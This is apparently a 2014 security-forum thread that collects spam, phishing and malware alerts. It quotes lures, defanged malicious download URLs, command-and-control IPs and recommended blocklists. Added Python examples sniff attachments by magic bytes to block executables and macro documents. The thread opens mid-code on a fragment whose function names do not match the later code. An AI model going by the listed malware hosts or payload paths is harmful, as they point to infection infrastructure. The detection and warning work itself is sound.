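    "quote.docx": make_ooxml(True),                      # macro hidden behind .docx
    "agenda.docx": make_ooxml(False),
    "invoice1211_pdf27.zip": make_zip({"invoice1211_pdf.exe": b"MZ\x90\x00"}),
    "EXCH DETAILS PR 7777709.zip": make_zip(
        {"7 TRANSACTION RPPP 00000123-PDF.jar": ZIP_MAGIC}),
    "report.pdf": b"%PDF-1.4\n",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(f"{name:32s} -> {classify_attachment(name, blob)}")
```

The order of the checks matters: the extension rule runs first so a .docm is rejected even if it is not a valid zip, and the VBA check runs before the archive recursion so a macro document renamed to .zip is still blocked rather than unpacked.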
AplusWebMaster
2014-11-13, 17:52
FYI...
Fake 'BankLine' SPAM - targets RBS customers
- http://blog.mxlab.eu/2014/11/13/fake-email-regarding-new-secure-message-from-bankline-that-targets-rbs-customers/
Nov 13, 2014 - "... intercepted -fake- emails regarding a new secure message from BankLine that targets RBS customers. The subject line is “You have received a new secure message from BankLine#24802254″ this email is sent from the spoofed address “Bankline <secure.message @ bankline .com>” and has the following body:
You have received a secure message.
Read your secure message by following the link bellow:
link-
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 1196.
First time users – will need to register after opening the attachment...
The embedded URL in our sample leads to hxxp ://vsrwhitefish .com/bankline/message.php. This will open up an HTML document with an embedded JavaScript script that makes use of ActiveXObject or a regular HTTP request and opens up a download in order to open and/or save the malicious file as instructed."
216.251.43.98: https://www.virustotal.com/en/ip-address/216.251.43.98/information/
... 5/60 2014-11-13 13:23:41 http ://vsrwhitefish .com/bankline/message.php
___
Fake 'Voice mail' SPAM ...
- http://blog.mxlab.eu/2014/11/13/voice-message-emails-contains-security-threat/
Nov 13, 2014 - "... intercepted a large campaign by email with the subject “Voice Message #0768384921 (numbers may vary)” and is a continuation of the previous campaign targeting RBS customers. This email is sent from the spoofed address “Message Admin <martin.smith@ essex .org.uk>” and has the following body:
Voice redirected message
hxxp ://crcmich .org/bankline/message.php
Sent: Thu, 13 Nov 2014 11:54:24 +0000
The embedded URL in our sample leads to hxxp ://crcmich .org/bankline/message.php. This will open up an HTML document with an embedded JavaScript script that makes use of ActiveXObject or a regular HTTP request and opens up a download in order to open and/or save the malicious file as instructed."
69.160.53.51: https://www.virustotal.com/en/ip-address/69.160.53.51/information/
... 3/61 2014-11-13 15:04:47 http ://crcmich .org/bankline/message.php?
___
Alert (TA14-317A)
Apple iOS "Masque Attack" Technique
- https://www.us-cert.gov/ncas/alerts/TA14-317A
Nov 13, 2014
Systems Affected:
iOS devices running iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta.
Overview:
A technique labeled “Masque Attack” allows an attacker to substitute malware for a legitimate iOS app under a limited set of circumstances...
(More detail at the URL above.)
:mad: :fear:
AplusWebMaster
2014-11-14, 16:35
FYI...
Fake 'Amazon frozen account' – Phish ...
- http://myonlinesecurity.co.uk/amazon-account-frozen-temporarily-phishing/
14 Nov 2014 - "'Your account has been frozen temporarily' pretending to come from Amazon <auto-confirm@ amazon .co.uk> is one of the latest -phish- attempts to steal your Amazon Account and your Bank, credit card and personal details. This one only wants your personal details, Amazon log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_phishing-email.png
If you open the -attached- html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_login.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. After submitting the information you get -bounced- on to the genuine Amazon .co.uk website:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_account_verification.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
CoinVault - new ransomware
- http://www.webroot.com/blog/2014/11/14/coinvault/
Nov 14, 2014 - "Today we encountered a new type of encrypting ransomware that looks to be of the cryptographic locker family. It employs the same method of encryption and has a very similar GUI (kills VSS, increases required payment every 24hr, uses bitcoin payment, etc.).
CoinVault GUI:
> https://i.imgur.com/ADEO21U.png
Here is the background* that it creates – also very similar.
* https://i.imgur.com/LAHkjT8.png
... this is the first Encrypting Ransomware that I’ve seen which actually gives you a free decrypt. It will let you pick any single file that you need after encryption and will decrypt it for you.
> http://i.imgur.com/F3enAqN.png
... it gives a good insight into what the actual decryption routine is like if you find yourself actually having to pay them. I suspect that this freebie will increase the number of people who will pay..."
- http://arstechnica.com/security/2014/11/new-cryptoware-title-borrows-page-from-drug-dealers/
Nov 14 2014
___
Flash Player updated ...
- https://blog.malwarebytes.org/online-security/2014/11/18-vulnerabilities-fixed-update-your-flash-player/
Nov 14, 2014 - "Adobe has fixed -18- vulnerabilities in their Flash Player, and you should update immediately, if you haven’t already done so. However, please ensure you’re installing / updating from the right place. For example:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd1.jpg
The above site claims:
It is recommended that you update Flash to the latest version to view this page. Please update to continue. Your Flash Plugin version is too low, causing the current sites and related softwares can not be opened properly, please update your Flash Plugin now!
The site -forwards- visitors to a sign-up page offering a “Mac cleaning” tool... confusing for anybody expecting Adobe Flash updates.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd2.jpg
The Adobe Flash Player website is the place to go for Flash installs*... Always cast a critical eye at the URL of any “Flash Player” site you happen to be on, and check the small print in case you end up with more than you bargained for. Fake Flash Player websites have been around for many years, and are often a prime source of unwanted PUP installs and the occasional slice of Malware..."
* http://get.adobe.com/flashplayer/ ... (Uncheck the 'McAfee' option if you choose not to use it...)
:fear::fear: :mad:
AplusWebMaster
2014-11-17, 15:07
FYI...
Fake Fax SPAM - malicious .DOCM attachment
- http://blog.dynamoo.com/2014/11/interfax-failed-fax-transmission-spam.html
17 Nov 2014 - "This -fake- fax spam comes with a malicious attachment
From: Interfax [uk@ interfax .net]
Date: 13 November 2014 20:29
Subject: Failed Fax Transmission to 01616133969@fax.tc<00441616133969>
Transmission Results
Destination Fax: 00441616133969
Contact Name: 01616133969@ fax .tc
Start Time: 2014/11/13 20:05:27
End Time: 2014/11/13 20:29:00
Transmission Result: 3220 - Communication error
Pages sent: 0
Subject: 140186561.XLS
CSID:
Duration (In Seconds): 103
Message ID: 485646629
Thank you for using Interfax ...
Attached is a malicious Word macro file called 00000293.docm which is currently undetected at VirusTotal*... Inside this .DOCM file is a malicious macro... which attempts to download a malicious binary from http ://agro2000 .cba .pl/js/bin.exe . This file is downloaded to %TEMP%\MRSWZZFEYPX.exe and the binary also has zero detections at VirusTotal**, and the Malwr report shows that it tries to connect to the following URL: http ://84.40.9.34 /lneinn/mo%26af.lipgs%2Bfn%7El%3Fboel%3D%3F+%3Fa%20%3F~pigc_k/ci$slf%2B%20l%3D%7E . It then drops a malicious DLL onto the target system which has a rather better detection rate of 12/53***. If you are a corporate email administrator then you might consider blocking .DOCM files at the perimeter as I can see no valid reason for these to be sent by email. You should definitely block 84.40.9.34 (Hostway, Belgium) as this is a known bad server that has been used in several recent attacks."
* https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416221806/
** https://www.virustotal.com/en/file/8307c13583837bcfc30e8c267133f33e3fff4d86abd59adcb7f1fb7dd04a0d54/analysis/1416222127/
*** https://www.virustotal.com/en/file/1a774212d3f20523c4ddd63dd657954eeb7bf97c19ce9a9838b5297239c0119b/analysis/1416222797/
84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/
- http://myonlinesecurity.co.uk/failed-fax-transmission-01616133969fax-tc-word-doc-malware/
17 Nov 2014
> https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416212735/
___
Fake Investment SPAM ...
- http://myonlinesecurity.co.uk/investment-opportunities-ireland-malware/
17 Nov 2014 - "'Investment Opportunities in Ireland' pretending to come from IDA Ireland (Home of Foreign Businesses) <info@idaireland.com> with a link to a malicious zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Investment-Opportunities-in-Ireland.png
Today's Date: investmentareas.rar: Extracts to: investmentareas.scr
Current Virus total detections: 26/55* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b05b065ab2fbb6db6c29fd0a6ad856bca0fafe46322d91890dc1755788ea6e7b/analysis/1416215003/
___
Fake 'Payment Declined' Phish ...
- http://myonlinesecurity.co.uk/bt-account-payment-declined-phishing/
17 Nov 2014 - "Any phishing attempt wants to get as much personal and financial information from you as possible. This 'BT Account- Payment Declined' pretending to come from BT .com <noreplymail@ btc .com> phishing scam is one of them. The phishers try to use well known companies or Government departments like British Telecom, HMRC, Inland Revenue, Virgin Media, British Gas or any company that many people are likely to have an account with. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/BT-Account-Payment-Declined.png
The link in the email leads you to a webpage looking like:
Screenshot2: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-log-in.png
That leads on to a page to enter all your details, including bank account, credit card, mother’s maiden name and everything else necessary to steal your identity and clean out your bank and credit card accounts:
Screenshot3: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details.png
Then you get a success page, where they kindly inform you that “The Anti Fraud System has been succesfully added to your account” and then are bounced to the real BT site:
Screenshot4: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details-success-.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
___
Fake 'Test message' SPAM plague continues..
- http://blog.dynamoo.com/2014/11/test-message-spam-plague-continues.html
17 Nov 2014 - "This plague of spam "test messages" has been going on for two days now, probably sourced from "Botnet 125"* which sends most of the spam I get. These messages are annoying but not harmful in themselves; I suspect they are probing mail servers for responses. If you have a catch-all email address then you will probably see a lot of these. The targets are either completely random or have been harvested from one data breach or another as far as I can see.
From: Hollie <Laurie.17@ 123goa .com>
Date: 17 November 2014 19:04
Subject: Test 8657443T
test message.
Murphy became a free agent on October 15, after refusing a minor league assignment. Silva implies the last cycle has begun, believing herself to be the host.
Icelandic had been heard. American CIA contract air crews and pilots from the Alabama Air Guard... ..."
* http://www.proofpoint.com/threatinsight/posts/dueling-dridex-campaigns-target-banking-customers.php
:mad: :fear:
AplusWebMaster
2014-11-18, 13:16
FYI...
Fake Invoice SPAM - Word doc malware attached
- http://myonlinesecurity.co.uk/email-contains-invoice-file-attachment-invoice-1633370-may-word-doc-malware/
18 May 2014 - "'Invoice #1633370 May' with a malicious word doc attachment saying 'This email contains an invoice file attachment' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This email contains an invoice file attachment
So far today, I have seen 3 different sized files attached to this email; all file names are random:
18 November 2014 : invoice_796732903.doc (59kb) Current Virus total detections: 1/55*
18 November 2014 : invoice_1952581.doc (41kb) Current Virus total detections: 1/55**
18 November 2014 : invoice_80943810.doc (22kb) Current Virus total detections: 0/54***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a78296121f16e13812c609c2d55245a492b6a992c99b403b2427e41acae9e72/analysis/1416303264/
** https://www.virustotal.com/en/file/70411393ea66130204abfb3653646dcb495538fbbc6a5a76bef1376625d2fcbf/analysis/1416304606/
*** https://www.virustotal.com/en/file/670011a08ddcde9d1892593a968f87e9e8800248f6bb9b8967b05ec4c34b64d0/analysis/1416304325/
___
Another Fake FAX SPAM run ...
- http://blog.dynamoo.com/2014/11/incoming-fax-report-spam-lets-party.html
18 Nov 2014 - "... 'need to load some more papyrus into the facsimile machine...:
From: Incoming Fax [no-reply@ efax .co.uk]
Date: 18 November 2014 13:16
Subject: INCOMING FAX REPORT : Remote ID: 766-868-5553
INCOMING FAX REPORT
Date/Time: Tue, 18 Nov 2014 14:16:58 +0100
Speed: 4222bps
Connection time: 01:09
Pages: 5
Resolution: Normal
Remote ID: 963-864-5728
Line number: 1
DTMF/DID:
Description: Internal report
We have uploaded fax report on dropbox, please use the following link to download your file...
This is (of course) utter bollocks, and the link in the email downloads a ZIP file document_8731_pdf.zip which in turn contains a malicious executable document_8731_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the Malwr report it makes these following HTTP requests:
http ://108.61.229.224:13861 /1811us1/HOME/0/51-SP3/0/
http ://108.61.229.224:13861 /1811us1/HOME/1/0/0/
http ://159593.webhosting58 .1blu. de/mandoc/narutus1.pmg
It also drops a file EXE1.EXE onto the target system which has a detection rate of 7/55**...
Recommended blocklist:
108.61.229.224
159593.webhosting58 .1blu .de "
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416318405/
... Behavioural information
TCP connections
108.61.229.224: https://www.virustotal.com/en/ip-address/108.61.229.224/information/
178.254.0.111: https://www.virustotal.com/en/ip-address/178.254.0.111/information/
** https://www.virustotal.com/en/file/5ec1e1850100849dd4750ef083824806304e82be5233e241b69b1960acc96324/analysis/1416318784/
- http://myonlinesecurity.co.uk/incoming-fax-report-remote-id-999-745-5477-fake-pdf-malware/
18 Nov 2014
- https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
___
Fake Voice msg SPAM again - PDF malware
- http://myonlinesecurity.co.uk/voice-message-685-869-9737-mailbox-226-fake-pdf-malware/
18 Nov 2014 - "'voice message from 685-869-9737 for mailbox 226' pretending to come from 'Voice Mail <voicemail_sender@ voicemail .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
You have received a voice mail message from 685-869-9737
Message length is 00:00:30. Message size is 225 KB.
Download your voicemail message from dropbox service below (Google Disk Drive Inc.)...
18 November 2014: document_8731_pdf.zip (12 kb): Extracts to: document_8731_pdf.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
:fear: :mad:
AplusWebMaster
2014-11-19, 16:24
FYI...
Fake Bank phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-improving-current-account-phishing/
19 Nov 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying something like:
-We’re improving your current account
-There have been unauthorised or suspicious attempts to log in to your account, please verify
-Your account has exceeded its limit and needs to be verified
-Your account will be suspended !
-You have received a secure message from < your bank>
-New Secure Message
-We are unable to verify your account information
-Update Personal Information
-Urgent Account Review Notification
-We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
-Confirmation of Order
This one is Lloyds bank 'We’re improving your current account' pretending to come from Lloyds Banking Group Plc <info@ emails.very .co.uk> The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. Lloyds actually -do- allow you to pay in and perform some transactions at a Post Office rather than going to your branch, so many users might get unwittingly caught out by this one and think they need to notify the bank.
Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/lloyds-We-are-improving-your-current-account.png
This one wants your personal details and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. If it says .EXE then it is a problem and should -not- be run or opened."
___
Azure cloud outages - MSN web portal offline
- http://www.reuters.com/article/2014/11/19/us-microsoft-web-idUSKCN0J309E20141119
Nov 18, 2014 11:53pm EST - "Microsoft Corp's Azure cloud-computing service, which hosts websites and lets customers store and manage data remotely, suffered serious outages on Tuesday taking its popular MSN web portal offline. According to Microsoft's Azure status page*, the problems started around 5pm Pacific time and have still not been fully solved..."
* http://azure.microsoft.com/en-us/status/#history
>> http://azure.microsoft.com/blog/2014/11/19/update-on-azure-storage-service-interruption/
Nov 19, 2014
:fear::fear: :mad:
AplusWebMaster
2014-11-20, 18:01
FYI...
Angler Exploit Kit adds New Flash Exploit...
- http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498
Nov 20, 2014 - "... Angler is just one of the many such exploit kits available to attackers, but the creators of this one seem to be especially quick about adding exploits for new vulnerabilities to the kit. In October, a week after Adobe released its monthly patch update, researchers saw Angler exploiting an integer overflow in Flash that had just been patched. “This is really, really fast,” Kafeine, a French security researcher who identified the attack at the time, said. “The best I remember was maybe three weeks in February 2014.” Now, Kafeine said he already has seen Angler exploiting a Flash vulnerability that was patched Nov. 11 in Adobe’s November update release*. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. “The vulnerability is being exploited in blind mass attack. No doubt about it: the team behind Angler is really good at what it does,” he said in a blog post*..."
* http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html
> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8440 - 10.0 (HIGH)
Last revised: 11/12/2014
Flash test site: https://www.adobe.com/software/flash/about/
___
Fake Donation Overpayment SCAM
- https://www.ic3.gov/media/2014/141120.aspx
Nov 20, 2014 - "... received numerous complaints from businesses, charitable organizations, schools, universities, health related organizations, and non-profit organizations, reporting an online donation scheme. The complaints reported subjects who had donated thousands of dollars, via stolen credit cards. Once donations were made, the subjects immediately requested the majority of the donation back, but credited to a different card. They claimed to have mistakenly donated too much by adding an extra digit to the dollar amount (i.e., $5000 was ‘accidently’ entered instead of $500). However, very few complainants actually returned the money to the second credit card. Many, through their own investigations, discovered the original card was -stolen- or the credit card company notified them of such. Also, some of the organizations’ policies did not allow funds to be returned to a different credit card."
:fear::fear: :mad:
AplusWebMaster
2014-11-21, 19:59
:mad:FYI...
Something evil on 46.8.14.154
- http://blog.dynamoo.com/2014/11/something-evil-on-46814154.html
21 Nov 2014 - "46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort... subdomains have been active on that server, they are ALL hijacked GoDaddy domains... (Long list @ the dynamoo URL above) ... The best thing to do is to -block- traffic to 46.8.14.154 because these domains seem to change every few minutes."
___
Fake 'Payment Received' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-from.html
21 Nov 2014 - "This -fake- financial spam has a malicious Word document attached.
From: Enid Tyson
Date: 21 November 2014 15:36
Subject: INV209473A Duplicate Payment Received
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £675.74 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Enid Tyson
Accounts Department
In this case the attachment is De_209473A.doc but it will probably vary with the subject name, the document itself has zero detections at VirusTotal (the Malwr report is inconclusive). This contains a malicious macro.. which connects to the following URL:
http ://79.137.227.123 :8080/get1/get1.php
...This has a VirusTotal detection rate of just 1/55*. The malware is hardened against analysis in a Sandbox so automated results are inconclusive...
UPDATE: A second version is going the rounds, with zero detections** and a download location of http :// 61.221.117.205 :8080/get1/get1.php ..."
* https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/1416584784/
** https://www.virustotal.com/en/file/ea85382435cf26e8066780b7115e4beef78caa0e8766bff324ff19e216496e4b/analysis/1416584533/
:fear: :mad:
AplusWebMaster
2014-11-23, 00:05
FYI...
Fake 'Herbal Root' email SCAM
- http://blog.dynamoo.com/2014/11/oplamo-herbal-root-scam.html
22 Nov 2014 - "... there is no such thing as "Oplamo Herbal Root". So, this spam is almost definitely a scam.
From: Mr. Tom Good Hope [mrtomgood@ gmail .com]
Reply-To: mrtomgoodhope@ gmail .com
Date: 22 November 2014 02:24
Subject: SUPPLY BUSINESS OF OPLAMO
My name is Tom Goodhope i based in Liverpool,UK working with a pharmaceutical company.
I have decided to contact you directly to discuss briefly via email about the ongoing supply that came up in our company. I think if you can understand English and India Language (Hindi,Tamil etc) you can take up this business proposal to buy out OPLAMO HERBAL ROOT from the local producer in India and make supply to our company as the direct producer to enable our company be buying direct from you on every subsequent order after this first purchase. OPLAMO ROOT its used for production of Anti-viral drugs & Animal Vaccines.Our company have been purchasing the materials from Pakistan but it is very scarce and expensive now in Pakistan. I've found out the truth that this Pakistan people purchases this product in India at the rate of $210 USD, while they supply to our company at the rate of $430 USD... Upon your reply i will clarify you more on how to start this business immediately, please drop your contact phone number for me to be able to contact you ASAP.
Thanks,
Mr Tom Goodhope
Company Secretary ...
... the originating IP address is actually 123.239.58.103 in Delhi, sent via 198.20.245.154 [eas.easylhost .com] in the US... give it a very wide berth.
___
Fake 'my new photo' SPAM - malware - Google’s webp images
- http://myonlinesecurity.co.uk/new-photo-malware-googles-webp-images/
22 Nov 2014 - "... a persistent attack by email for some time now. The subject is always “my new photo” or the equivalent in Spanish. Until 2 days ago the -zip- attached to the email just contained a single malware file which is generally identified as Androm or Gamarue or Wauchos depending on which antivirus you have installed. It obviously takes a few hours or even a day or more for the antivirus companies to catch up with new versions so some users get infected. Over the last few days there has been a change in delivery methods. Along with the “normal” executable file there is what appears to be a standard jpg that won’t display natively in Windows Explorer or in the majority of imaging/photo editing/viewing programs. It will display in Chrome browser. Looking at the file headers, the image is a genuine image but is the “new” webp format from google https ://developers.google .com/speed/webp/ which needs a codec from google to display in Windows Explorer or a plug in to display or use in common image editing/viewing programs. We will almost certainly see requests or comments in various forums or facebook or other tech help sites. It is believed that if a user “accidentally” or otherwise runs the exe file then the image is displayed in the browser (if chrome is default) or the google plugin or codec has been installed and the user thinks that it was just an image and not a malware file. Of course the .exe file has the extension hidden by default and the icon suggests it is a jpg image file which makes the unwary more likely to click on it and consequently become infected. I have been charting the progress of this malware for some time now, since it first appeared at end of August... we do see quite a few posts saying that the user cannot see the jpg image in an email or on a webpage in IE, FF etc but it -does- in chrome OR why they cannot view or edit a downloaded jpg.
The zip file contains 2 files - 1 is a standard .exe with an icon that looks like a jpg that if you don’t have show hidden extensions shown can confuse a user and lead to infection when clicked on... If you open the image files in a hex editor or analysis program you will see the file type headers information:
for jpg they are ……JFIF…..`.`……Exif..MM
for PNG they are .PNG……..IHDR……………g…..sRGB………gAMA……a…..pHYs……….
For Webp they are RIFFhs..WEBPVP8 "
(Comparison example images shown at the URL at the top.)
:fear: :spider: :mad:
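Added example (not code from the blogs quoted above or from this forum) that serves both the .DOCM perimeter-blocking advice in the Interfax fax post and the JFIF / PNG / RIFF-WEBP header comparison in this post: a small attachment sniffer that judges a file by its magic bytes and ZIP contents rather than by its name, so a "photo.jpg.exe", a .jpg that is really WebP, or a .docx renamed to hide a VBA project all get flagged. Every sample payload is constructed in memory; only the file names are taken from the quoted posts.

```python
"""Attachment content sniffer (added example, not the quoted blogs' code).

Judges an attachment by leading bytes and ZIP contents instead of its name.
All sample payloads below are constructed stubs: headers only, no real
executable code or image data.
"""
import io
import struct
import zipfile

MACRO_EXTS = {"docm", "dotm", "xlsm", "xltm", "pptm", "potm"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "webp"}
MAX_DEPTH = 2  # how far to unpack nested archives


def sniff(data: bytes) -> str:
    """Identify content by its leading bytes (the headers the post describes)."""
    if data[:2] == b"MZ":                                  # DOS/PE executable
        return "exe"
    if data[:3] == b"\xff\xd8\xff":                        # JPEG SOI; 'JFIF'/'Exif' follows
        return "jpeg"
    if data[:8] == b"\x89PNG\r\n\x1a\n":                   # PNG signature, then IHDR chunk
        return "png"
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":      # RIFF container tagged WEBP
        return "webp"
    if data[:4] == b"PK\x03\x04":                          # ZIP (also OOXML .docx/.docm)
        return "zip"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":    # OLE2 compound file (.doc/.xls)
        return "ole"
    return "unknown"


def extension(name: str) -> str:
    """Last extension, lower-cased; 'photo.jpg.exe' -> 'exe'."""
    return name.lower().rsplit(".", 1)[-1] if "." in name else ""


def zip_members(data: bytes):
    """Yield (name, bytes) for each file in an in-memory ZIP; nothing if not a ZIP."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if not info.is_dir():
                    yield info.filename, zf.read(info)
    except zipfile.BadZipFile:
        return


def classify(name: str, data: bytes, depth: int = 0) -> str:
    """Return 'block: ...', 'warn: ...' or 'ok: ...' for one attachment."""
    ext = extension(name)
    kind = sniff(data)
    if kind == "exe":                                      # an .EXE is a problem, whatever its icon
        return "block: executable content in %s" % name
    if ext in MACRO_EXTS:                                  # the perimeter rule from the fax post
        return "block: macro-enabled extension .%s" % ext
    if kind == "zip":
        if depth >= MAX_DEPTH:
            return "warn: archive nested too deeply"
        members = list(zip_members(data))
        names = [m[0] for m in members]
        if "[Content_Types].xml" in names:                 # OOXML package: look for a VBA project
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return "block: VBA project inside %s" % name
            return "ok: OOXML without macros"
        verdicts = [classify(n, d, depth + 1) for n, d in members]
        for level in ("block", "warn"):                    # worst member decides
            for v in verdicts:
                if v.startswith(level):
                    return "%s (inside %s)" % (v, name)
        return "ok: archive"
    if kind == "ole":
        return "warn: legacy OLE document, scan for macros"
    claimed = "jpeg" if ext == "jpg" else ext
    if ext in IMAGE_EXTS and kind in ("jpeg", "png", "webp") and kind != claimed:
        return "warn: .%s name but %s content" % (ext, kind)   # e.g. WebP named .jpg
    return "ok: %s" % kind


def build_zip(members) -> bytes:
    """Constructed in-memory ZIP from (name, bytes) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, d in members:
            zf.writestr(n, d)
    return buf.getvalue()


def build_ooxml(with_macro: bool) -> bytes:
    """Constructed minimal OOXML package, optionally with a VBA project stub."""
    parts = [("[Content_Types].xml", b"<Types/>"), ("word/document.xml", b"<w:document/>")]
    if with_macro:
        parts.append(("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed stub"))
    return build_zip(parts)


# Constructed sample payloads: headers only.
FAKE_EXE = b"MZ" + b"\x00" * 62
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
WEBP_BODY = b"WEBPVP8 " + b"\x00" * 16
WEBP = b"RIFF" + struct.pack("<I", len(WEBP_BODY)) + WEBP_BODY
```

Calling `classify("document_8731_pdf.zip", build_zip([("document_8731_pdf.exe", FAKE_EXE)]))` unpacks the archive and returns a block verdict for the executable inside, which is the shape of every "pdf" and "fax" sample in this thread.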
AplusWebMaster
2014-11-24, 19:00
FYI...
RFID Payment Cards Hack possible with Android App
- http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-rfid-payment-cards-made-possible-with-android-app/
Nov 24, 2014 - "... high-risk Android app detected as ANDROIDOS_STIP.A in Chile. This app, found distributed through forums and blogs, can be used to hack into the user’s RFID bus transit card to recharge the credits... Paying via RFID cards is becoming more popular nowadays as more mobile devices add NFC support. Banks, merchants or public services issue RFID cards to their customers with prepaid credits... Using widely available tools, the attacker cracked the card’s authentication key. With the cracked key and the native NFC support in Android and the device, cloning a card and adding credits can be easily implemented in a mobile app... These particular MIFARE models were discontinued years ago and supplemented with more secure models. However, it appears that card issuers have opted for cheaper solutions which put their customers at risk...
> http://blog.trendmicro.com/trendlabs-security-intelligence/good-nfc-habits/
We recommend customers take steps to protect RFID cards in their possession. They should also periodically check the balances of their accounts as well. In addition, if possible, they should check if any cards they are currently using are vulnerable and report these to their providers. RFID/NFC attacks are a well-known risk..."
> http://blog.trendmicro.com/trendlabs-security-intelligence/safe-nfc-for-businesses/
___
Fake MyFax SPAM - poorly-detected malware
- http://blog.dynamoo.com/2014/11/myfax-message-from-unknown-spam-leads.html
24 Nov 2014 - "Fax spam again... This spam appears to come from the person receiving it (which is an old trick).
From: victim@ victimdomain .com
Sent: 24 November 2014 15:31
To: norep.c@ mefax .com
Subject: MyFax message from "unknown" - 3 page(s)
Fax Message [Caller-ID: 1-407-067-7356]
http ://159593 .webhosting58 .1blu .de/messages/get_message.php
You have received a 3 page fax at Mon, 24 Nov 2014 15:31:23 +0000.
* The reference number for this fax is chd_did11-14186364797-10847113200-628.
View this fax using your PDF reader.
Thank you for using the MyFax service!
